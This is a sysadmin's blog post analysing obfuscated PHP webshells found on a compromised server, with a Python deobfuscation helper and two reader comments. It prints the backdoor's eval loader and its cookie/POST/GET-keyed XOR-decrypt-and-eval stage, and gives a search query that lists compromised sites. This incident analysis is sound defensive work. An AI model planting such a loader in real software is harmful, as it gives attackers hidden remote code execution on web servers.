you have been hacked: zend_ion_index.php, wp_admin.php and inndex.php

From time to time, operating internet services can be quite demanding, especially when things don’t run the way they should.

A perfect example of this is what happened yesterday. We were notified by an automated watchdog service that one of the systems we operate on behalf of our customers had been compromised by some hackers, who were abusing the compromised box as storage for their data.

A look into the logs quickly revealed that the hackers had obviously gained access to an FTP account. So “fixing” the issue was not too difficult: a simple password change and removal of the alien data was enough to stop most of the problems.

three culprits
Investigating the stuff they had uploaded, I found three interesting files that triggered my curiosity:

  • inndex.php
  • wp_admin.php
  • zend_ion_index.php

For a PHP script, the first file is quite difficult to analyze. The code looks like this:

<?php for($o=0,$e='&\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&

[...]

(*,*(:)^',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{
$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>

So this is just a 12K portion of scrambled eggs. Dissecting the piece further, I quickly found that the “eval($d)” just produced another, almost equally scrambled PHP script, but with a different ending (I’ve reformatted pieces of the code to improve readability):

for($o=0,$e='&\'()*+,-.:]^_`{|+:*+,
[...]
|(,\'|*:,\'',$d='';@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{
$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}
 
if( !@isset( $_SERVER ) ) {        // PHP 4 fallback: alias the old long-named request arrays
  $_COOKIE=&$HTTP_COOKIE_VARS;
  $_POST=&$HTTP_POST_VARS;
  $_GET=&$HTTP_GET_VARS;
}
$k=$_COOKIE['key'];                // the key is taken from a cookie first ...
if ( empty( $k ) ) {
  $k=$_POST['key'];                // ... then from POST ...
}
if( empty( $k ) ) {
  $k=$_GET['key'];                 // ... then from GET
}
if ( ! @function_exists( 'decrypt' ) ){
  eval( 'function decrypt( $e, $k ) {  // repeating-key XOR of ciphertext $e with key $k
    if(!$k){
      return;                          // no key, no output
    }
    $el = @strlen( $e );
    $kl = @strlen( $k );
    $rl = $el%$kl;                     // bytes left over after the last full key-sized block
    $fl = $el - $rl;                   // bytes covered by full key-sized blocks
    for( $o = 0; $o < $fl; $o += $kl ) {
      $p = @substr( $e, $o, $kl);
      $d .= "$k"^"$p";                 // PHP string XOR works byte by byte, truncating to the shorter operand
    }
    if ( $rl ) {
      $p = @substr( $e, $fl, $rl);
      $k = @substr( $k, 0, $rl);       // truncate the key so the XOR covers the short tail
      $d .= "$k"^"$p";
    }
    return( $d );                      // $d is never initialised; PHP treats it as an empty string
  }');
}
$d = @decrypt( $d, $k );eval($d);      // decrypt the layer-1 output with the key, then execute it

In other words: the script expects a parameter “key”, passed either as a cookie or as an HTTP POST or GET parameter. Using that parameter as the key, it decrypts $d with a repeating-key XOR and evaluates the result. Now, unfortunately, I don’t have that key and so far have not been able to retrieve one from the server logs; neither cookies nor GET parameters are logged by default, so that script will probably remain undisclosed.
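To peel both layers statically during triage, here is an added Python example (not code from the post or from the dropped files). The sample dropper string is constructed from the alphabet and the first eight character pairs shown above, and the function names are my own:

```python
"""Static peeler for the two obfuscation layers in the dropped PHP files.
Added example, not code from the original post. Layer 1: the first 16
chars of $e form an alphabet and every later char pair is one byte (high
nibble, low nibble). Layer 2: repeating-key XOR with the 'key' parameter."""
import re

# Constructed sample dropper: the real alphabet plus the first eight pairs
# quoted in the post, which decode to the start of the next stage.
SAMPLE_DROPPER = ("<?php for($o=0,$e='&\\'()*+,-.:]^_`{|,,,|-((.(*,|)`)&',$d='';"
                  "@ord($e[$o]);$o++){if($o<16){$h[$e[$o]]=$o;}else{"
                  "$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d); ?>")

def looks_like_dropper(php_source: str) -> bool:
    """Cheap triage signature for this loader family: the @ord()-terminated
    loop over $e, the 16-entry table $h and a closing eval($d)."""
    return ("@ord($e[$o])" in php_source and "$h[$e[$o]]=$o" in php_source
            and "eval($d)" in php_source)

def extract_e(php_source: str) -> str:
    """Pulls the single-quoted $e literal out of the loader and unescapes it."""
    m = re.search(r"\$e='((?:\\.|[^'\\])*)'", php_source, re.S)
    if not m:
        raise ValueError("no $e literal found")
    return m.group(1).replace("\\'", "'").replace("\\\\", "\\")

def decode_nibble_layer(e: str) -> bytes:
    """Replicates the PHP for-loop: $h maps the first 16 chars to 0..15,
    then each following pair becomes chr((hi << 4) + lo)."""
    if len(e) < 16:
        raise ValueError("alphabet incomplete")
    h = {ch: i for i, ch in enumerate(e[:16])}
    if len(h) != 16:
        raise ValueError("alphabet has duplicate characters")
    body = e[16:]  # a char outside the alphabet raises KeyError (PHP would use 0)
    return bytes((h[body[i]] << 4) + h[body[i + 1]]
                 for i in range(0, len(body) - len(body) % 2, 2))

def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """The inner decrypt(): repeating-key XOR. PHP's string ^ truncates to
    the shorter operand, hence the separate tail handling in the original;
    indexing key[i % len(key)] is equivalent and is its own inverse."""
    if not key:  # the original returns nothing for an empty key
        return b""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def peel(php_source: str, key: bytes = b"") -> bytes:
    """Layer 1 always; layer 2 only when the key is known."""
    stage = decode_nibble_layer(extract_e(php_source))
    return xor_decrypt(stage, key) if key else stage
```

Run `peel()` over a recovered dropper to get the next stage; without the key, the layer-2 output stays XOR ciphertext, which is exactly the dead end described above.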

excellently crafted work
The other two scripts, wp_admin.php (which has absolutely nothing to do with the WordPress wp_admin.php; the site does not even run WordPress) and zend_ion_index.php, are different, luckily. They are equally scrambled but contain a scrambled version of the key within their code, so the issue was just to crack the MD5 keys using the “usual sources”, and voilà, you actually get a very decent PHP file manager, see for yourself:

the wp_admin file manager in action

What a sad thing that this tool is not used for good; this looks like a truly excellent piece of work that could come in handy for any sysadmin.

The file manager even allows you to connect it to a remote control server, so the compromised box can be administered without even leaving entries in access.log or similar.

Both wp_admin.php and zend_ion_index.php contain the same file manager, but in different versions.
Removing the tools was of course not difficult, and luckily the hackers did not intend to destroy anything on the web server itself, so the damage is limited.

A listing of more than 200 compromised sites (and growing)
What really scares me, however, is this google query:

https://www.google.com/?q=zend_ion_index.php

Go and try it for yourself: you get a listing of more than 200 compromised sites, most of which have at least wp_admin.php installed as well …

Unfortunately, due to the sheer number, I just don’t see a way to inform the affected administrators …

Anonymous

I have come across these same files on a couple compromised servers. I’d love to share/compare notes. I wrote a beautiful python script that cracked the key for me in a couple minutes 😉

Drop me a line at officer a7 militia d0t cc

Anonymous

What’s the key?
